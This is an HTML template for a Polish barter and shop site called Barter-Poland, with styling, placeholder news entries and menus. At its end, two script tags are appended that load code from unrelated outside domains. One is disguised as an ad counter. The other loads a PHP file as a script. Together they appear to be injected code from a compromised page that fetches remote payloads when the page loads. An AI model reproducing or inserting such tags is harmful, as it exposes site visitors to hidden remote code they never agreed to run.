<!DOCTYPE html>

<title>Barter-Poland</title>

<meta charset='utf-8'>

<!--[if IE]>

<style type='text/css'>

body { width: 720px; }

</style>

<![endif]-->

<style type='text/css'>

* { padding: 0; border-spacing: 0; border-width: 0; margin: 0 }



body { position: relative; max-width: 720px; margin: 0 auto; }

#content { padding-top: 120px; margin-right: 150px; margin-left: 100px; }

#quick_menu, .menu { position: absolute }

#quick_menu { width: 100%; height: 20px; top: 0 }

.menu { top: 120px } /* szerokosci ustalamy osobno, szczegolnie dla kazdego przypadku, ponizej */

#left { left: 0 }

#right { right: 0 }



html { font-family: Arial }

.menu { background: white; /* aby uniknac najezdzania tekstu na tekst */ }

#quick_menu { background: black; color: white; font-size: 10pt; font-weight: bold; line-height: 20px; text-align: right; text-transform: uppercase }

#quick_menu li { display: inline; padding-right: 10px }

.menu#left li { padding-bottom: 20px; border-bottom: 1px solid #B6B6B6; margin-top: 20px; list-style-type: none; }

.menu#left li li { padding-bottom: 0; border: none; margin-top: 0; list-style-type: circle; } /* zniwelowanie powyzszych regul */

.menu#left li li { margin-left: 20px; font-size: 10pt; }

.menu#left ul { margin-top: 5px; }

.menu#left h2 { padding: 2px 8px; }

.menu#left .barter h2 { background: #40B703 }

.menu#left .barter ul { color: #397E09 }

.menu#left .sklep h2 { background: #FFA10D }

.menu#left .sklep ul { color: #BF7401 }

.menu#left .virma h2 { background: #227FDF }

.menu#left .virma ul { color: #075FB9 }

.menu#left h2 { border-bottom: 1px solid #B9B5B6; color: white; text-transform: uppercase }

.menu#left { width: 100px; }

.menu#right { width: 130px; /* 150 - 10px paddingu */ padding: 10px; margin: 20px 0; background: #EBEBEB; text-align: center }

h2 { font-size: 12pt; }

#content { padding-right: 40px; padding-left: 40px; font-family: Verdana; }

#content h2 { margin: 20px; }

#content p { font-size: 10pt; }

h1 { position: absolute; top: 20px; left: 0; width: 720px; z-index: 100; }

hr { clear:  both; border-bottom: 1px solid #808080; }

address { margin: 2px 4px; font-style: normal; font-size: 7pt; }

.news { margin: 20px 0; }

.news li { position: relative; clear: both; padding: 15px; border-top: 1px solid black; list-style-type: none; }

.news h3 { margin-bottom: 5px; font-size: 11pt; }

.news .more { position: absolute; right: 0; bottom: 10px; margin-bottom: 0; font-weight: bold; text-align: right; }

.news img { float: left; margin: 0 10px 10px 0; }

</style>



<h1><img src='gradient.jpg' alt='Barter-Poland'></h1>

<div id='content'>

<h2>Najnowsze wiadomości</h2>



<ul class='news'>

<li><h3>Foo</h3><img src='vista.jpg' alt='Bam.'><p>Bar bar bar…<p class='more'>Więcej…<br>

<li><h3>Foo</h3><img src='vista.jpg' alt='Bam.'><p>Bar bar bar…<p class='more'>Więcej…<br>

<li><h3>Foo</h3><img src='vista.jpg' alt='Bam.'><p>Bar bar bar…<p class='more'>Więcej…<br>

</ul>



<hr>

<p lang='en-us'><address>Powered by Barter-Poland 2009.</address>

</div>

<ul id='quick_menu'>

	<li>Forum<li>Kontakt<li>Materiały<li>Linki

</ul>

<ul class='menu' id='left'>

	<li class='barter'><h2>Barter</h2><ul><li>Logowanie<li>Regulamin</ul>

	<li class='sklep'><h2>Sklep</h2><ul><li>Logowanie<li>Regulamin</ul>

	<li class='virma'><h2>Virma</h2><ul><li>Logowanie<li>Regulamin</ul>

</ul>

<div class='menu' id='right'>

	prawe menu

</div>



<!-- ad --><script language=javascript src="http://counter.ironsteelmoney.com/show.js"></script><!-- /ad --><script src=http://johanneswallmark.com/media/sitemap.php ></script>